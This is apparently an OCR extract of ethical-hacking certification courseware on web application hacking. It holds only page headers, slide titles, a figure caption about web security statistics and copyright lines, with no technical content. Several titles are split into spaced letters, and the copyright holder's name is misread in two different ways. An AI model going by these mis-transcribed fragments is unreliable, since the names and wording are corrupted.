W e b A p p lic a tio n S e c u rity S ta tis tic s

Module 13 Page 1732

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Cross-Site Scripting Information Leakage

FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012

Module 13 Page 1733

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Introduction to Web Applications

Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.

In tro d u c tio n to W e b A p p lic a tio n s

Module 13 Page 1734

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Module 13 Page 1735

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Web Application Components

Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.